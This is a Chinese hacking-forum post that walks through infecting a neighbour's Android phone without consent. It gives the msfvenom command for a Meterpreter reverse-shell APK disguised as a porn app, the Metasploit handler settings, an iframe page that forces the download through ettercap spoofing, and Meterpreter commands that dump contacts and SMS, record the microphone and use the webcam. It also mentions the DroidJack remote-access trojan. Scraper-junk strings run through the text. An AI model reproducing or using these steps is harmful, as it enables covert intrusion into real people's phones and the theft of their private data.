找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1625|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) B# L+ l* U3 {" M 五、msf+ettercap入侵邻居安卓手机 # X% G2 x- `* R6 {

( t! K! Z! `' G6 l$ S1 N0 @6 q1 `

1 @" {& x, B! O5 C+ s 首先启动msf ' ]8 d, b# d2 \! G S; z

+ G( m1 V$ X" E0 m' Y

- K, s) s6 |2 V- h2 U 先用kali生成一个安卓木马,如下命令: . ?- d9 k8 m1 G! ]( d6 U

5 O- a8 D3 L9 q! Z/ k h4 G

; z# P r) j U% ]- F+ P Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ' w) p/ d1 u( d' L& g

4 s& r" T+ \8 i

V* G) D. a# M1 P1 R4 ]) {! U1 N; x, y 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ) N% z5 n) U, o

7 }$ l2 A/ _; ?$ a* _( x

0 E4 u4 m. C4 k3 ~ F; j; ^" E/ M6 v 然后进入msf # W; X$ w: y# N8 a+ H4 y0 c

- q* s7 ?; ^; L( Z3 S( @3 J

/ Y& r. e, k; _( @; t4 d# e use exploit/multi/handler 5 _* K/ S& e d* o- B1 R' E& P

0 W, b( g3 V6 W) M. h# h# g' s

$ a" x5 p, j) L7 [' b! Z2 \( Y. L2 A set payload android/meterpreter/reverse_tcp 2 r' Z5 h$ q. C2 `- N/ m

0 o9 O5 b4 f3 F0 i8 w

. K1 s0 T, m/ c1 f set LHOST 192.168.0.109 //ipkailiip 0 b, d1 Q# Y) U4 T. V1 h

3 `* B# m! F; o( A# T; W7 c

" `6 v4 n N8 ^, i' P, r. u set LPORT 44444 //端口一定要与前面生成的木马的端口一致 1 t* k g c5 L) i4 r$ S/ j( t/ u; b

* m/ t* e# e4 b8 F, B' U

; d: G6 H ^! m Exploit - \" p5 C3 h% z2 p( h# y0 _

: O- ^) X6 U0 V

9 ]2 k+ D [2 C. ~/ H1 o7 }5 g$ Z7 |   % e* Y! ?% C' e

1 }! J3 U0 i u8 `

4 p$ Z( ?; L. S; Q9 v 下面我们开启ettercap -G * l0 T" a5 U/ U6 {

# ?+ I q$ a* ?# D0 G' v6 r

/ B) f# s" {" `; c5 h# B" j 我物理IP 1 ?" n) G/ O2 }; _3 P; L0 Z

. \4 I8 g+ Q( Q& X5 s

" }5 s& g4 ], S9 ^   ; n4 h( O) W: V. u

" l6 r# S$ o% g8 R; L; w/ N

2 H1 D: p# f+ F4 d! i# t( L% L 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 9 F- ^: b+ B$ O- U8 N2 J5 ]

4 ], f$ r# [# k+ ^ K* M

+ a2 h, O% a; r; |, M 下面我们来设置一下 * x/ K4 t$ Q3 R1 j. n" Z0 {

; T5 i3 B0 |' U! f' h

& g1 r3 {, ?; f3 G: F9 w D   4 t" ]) m6 _# @

/ h8 W4 F/ D4 x$ M: v4 d% Q9 X

/ |8 y% u3 p* W/ ^4 b! {2 q5 j 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 8 J( F- V* |1 Z3 j' `( g

2 \1 ?/ D1 m* ^: u6 B# D

$ h$ V( r; h" C6 a- V   1 M* s2 g# E5 x2 g

7 D1 A! I$ y3 I- E1 C: P4 I8 g' @

; G7 _ A2 o1 i- K# C' {/ J4 `   2 e, |9 v( Z$ n2 Z- F- r( A

/ b: x. f3 v9 L9 u' B8 E

8 [: {5 c1 y( {4 f# g   ) }0 y, ^" U. z

3 Z/ p; J. D* H8 s

# Z, c m! C1 N+ e) v   : p/ v# ?( P' w( A" C. X# _

- ]) m0 E7 J3 x+ ?% M

8 q; {! L8 A9 @$ N$ u   : L4 }7 I' I9 \

+ _& W5 z& `! _

9 v% Q* ?+ h. }' F2 j% ?6 l   $ K- y" _& f0 M0 K8 Y

8 `% P; M8 z& x( @( h: U

$ \, J% ?( B# H3 {0 K8 c, E   ' M$ J3 h% M' E4 b

. P: e0 L, z0 n- \( A K. y! y

1 O; f% B/ z; p* e   & m. L. C' q! K% g. |/ l" H

8 a) M/ } o! S4 S/ u+ M

) Z* [+ |7 x- `7 a   2 I: P7 C% | D% K

# S8 w9 H* ~1 m6 m3 R

0 K: Q5 c: q; c1 @4 X. g9 c) }   0 b8 v9 \5 c u) c, w/ Y* T+ }* N- q, q! R

9 p; Z' Y8 E7 T$ W

, l- ^' K! h- V. I* D) K- s3 G2 l   . L5 `& T6 z1 [6 `& _" x

1 R5 j: G2 h* E

3 }% V* T9 k# ~# }   " A. ?! Z3 e) S5 U; H9 D5 @

2 g* Q7 a# ~8 O" j3 g

* l$ j! K8 P1 G0 C; X, e! C   + P5 u P: e& m* L

5 i% k/ o+ ~7 S/ l% K

6 L3 g# G( Q3 N" h6 r" y 下面我们开始攻击 ! D% \0 Z9 Z8 u9 V( M3 N

+ @" @- ^2 H+ P7 L

8 q& P' ~+ v) Q! t' l   T% I/ P5 m k" q! n- X6 v6 |

2 i2 X6 a! E9 H m

% p o4 k h) k& R0 }. ~   7 T7 s5 M* o+ z8 {& [ |0 I6 b

2 E3 Q$ @# d h' |

# I7 X3 ^! ^+ |8 E3 \   - g G5 {' W. x3 f( Z( f `- J

" z" y8 y) D+ C" P: g

) D3 W; n* l$ O   2 }0 H" g* r! V: D- J

1 U* S1 f% |, t6 i

1 }* m5 ^' O1 J4 K   5 z& ^" |" g0 p* i5 c o& P

. r4 |5 a) o& _( X

( E1 E( z% G, {. _' V5 Q3 x, D 大概过了5分钟多,发现反弹成功了 ( ^/ X ]! z0 H6 G

3 |4 D- P9 m+ A2 x8 `5 [

4 o% C( H1 f" U+ @7 T7 \; K   8 ?, y' r. [0 }5 o- `5 I, [

9 I: Y N# e; H- ?! D0 j. H

; S2 k+ ^) B: s% N   " s# P: _: G4 W J, m2 D

) H# _" j! W6 X8 ?+ o

( E! _" |/ B3 r; d   ( |; I9 m' t9 w( {3 g6 t

9 Q9 d* \+ B) x

* ~3 ^( g0 b. S5 Y: i) y/ ?   0 X. _+ V! ?& ?! ?- `0 ?* F$ B

2 F- R7 |! w3 h+ A) a

1 H& z, I: X8 \5 B9 W   9 q n% l7 W& V0 ~- A5 V

6 N( v) l/ |, L, s* t6 E# \: Q1 u

2 [$ ~5 A$ t$ @   ) G) R9 \' R& u) ]' E( }. r! d

0 n' r6 O/ n9 G

, ^$ v( v3 V) F   $ |, x+ ~6 t' x' h/ Z

- p5 [( `3 i; W

, Q3 |# r7 I* I% @# x( b 执行命令 N8 c" j2 h/ Z/ \" `& P

5 B' l j. Q+ [0 O+ z

- K' L6 g+ \* U7 J S   * [* F2 b9 v) [. X+ M- ~+ f

, v. J6 t4 @0 _( |

" m" S& b4 c" p5 N' m dump_contacts    --》这个是导出电话 3 E4 {6 `/ {; d# x3 j$ j3 f$ D2 o3 M1 I

, [5 H' \( e7 M% k1 A

4 R6 D% Z/ F. r3 T, a2 d dump_sms --》这个是导出信息 % L+ z, X T$ s Z, m# J- O

' L% H" B" h3 Q3 G9 s' M

4 K, d% u2 V" ^ record_mic     Record audio from the default microphone for X seconds / }0 A3 M# e) t+ Q9 R

6 V" V9 S2 S' e. O

$ Z0 @/ J* E8 ^/ ~+ V% x0 Z6 r, ]) m     webcam_chat    Start a video chat ' d' S! [, c& e6 V2 r+ U

) T! l/ k" {3 [/ d- O( b0 P8 N' q

4 S7 w* |: o" Q     webcam_list    List webcams % z4 K! a: D2 f( p3 {8 A

& F( Z3 `& h# i" s( {

$ w1 |* t! P, T2 T7 {$ P. H# o     webcam_snap    Take a snapshot from the specified webcam : V1 ~1 A! w$ o8 d

/ a6 v/ u; T+ N; j7 O# y

4 R( ?8 Z+ S8 O5 p+ M0 m" z7 N webcam_stream  lay a video stream from the specified webcam . |& `! w1 K5 j+ ?6 G" W) L ]+ A

- W$ y& y, Q! E6 X1 t

' O2 U! Z3 ^; j7 C7 D/ U: V* z   M# Y& g' o3 K

% _. f- ^3 F/ @9 _# x

# W& `8 `2 G5 h. w, _% y- ?: U* @2 ~   * f8 Z2 G% p& ?- U* o% W

2 X: u, M7 E* T

6 c' v( P8 y1 l7 o" u( Z% h7 Y 我们打开看一下电话薄, / x- m! |# h# E+ c

; s* M& N! }4 p$ V; X$ @, q

5 g; V. V5 ^9 {, I5 f9 C   - X j' h* g- @0 T& @, D5 \

! J8 p; V' I4 w. p4 y% Q

8 u/ y6 x u) z5 H, @   ( Y r1 X8 E# r" D% Y- B) G

2 |* g' o* \& V d- N( c' L

# Z2 a; M( T7 A4 ]   5 \0 ^- m, v: ~+ Z! f& V- r1 Q

' Z6 }& e( K7 q5 q' T

; o# V) E- f: f- }; u. u& x& w   ; t, @# _- Y- N5 J! C

/ Q" g! X/ h0 i4 Z8 Y$ x4 w' h8 \

, v. j# ^: m. ^9 O' |   # Z& D8 q2 ~+ W* v+ N

* E9 `5 ]$ r2 Q, S8 G

5 q8 B! S s$ ]1 k" s2 E, _" Z% H   2 u+ u0 P) k9 j* _0 s, C

: ?& d3 P5 a) ^

) L% Q% {5 |- K3 o 我们同时欺骗成DroidJack木马,使用方法如图: 6 w) x) G6 t7 f3 g, n

$ p1 O. q0 P L# M* b: ]& Y- v$ T

7 a" z; }6 t& N   7 O( v. j$ S% A4 h; b( i

8 h$ f( l# \( p- b; Q- y H

/ Z6 a6 Q2 |' o- }+ q- d' D   " c" v! @5 G1 U' `8 g

; i9 M$ C& a% |9 Y& r8 \8 o

* M! b; Q2 Q4 R& g   6 T0 K2 W# ?5 B8 E+ E0 u

' [1 J" [/ \0 u S L

8 B+ n8 r6 C' B% ^+ U+ D 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 0 i, k8 y5 p& ^4 Q5 R; [/ @

; c+ |7 I4 G7 W. g5 w; T

5 t9 V5 o+ y) `   - X2 Z/ {4 S' s, H: j& H- S( r

$ b, ]9 A4 ~% y' |

- v$ g. [ G" t6 |7 f" ^: ~' {   1 L; ?! d% t3 @' k9 Z+ Z! N

. K* U, `) A3 s% C D

1 p) u: D X$ Q& H& k4 I1 ?   " t F& D5 O0 S

! M& r& k, M; C; | Z, g

$ p7 `% X0 f9 d; M 8 j7 z4 g' l$ C9 x

* m9 j5 e; ?* L( Q/ N! g

6 w/ I' S2 v1 K7 X$ `9 s
* n4 c0 D& Z+ l) b Q. V

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表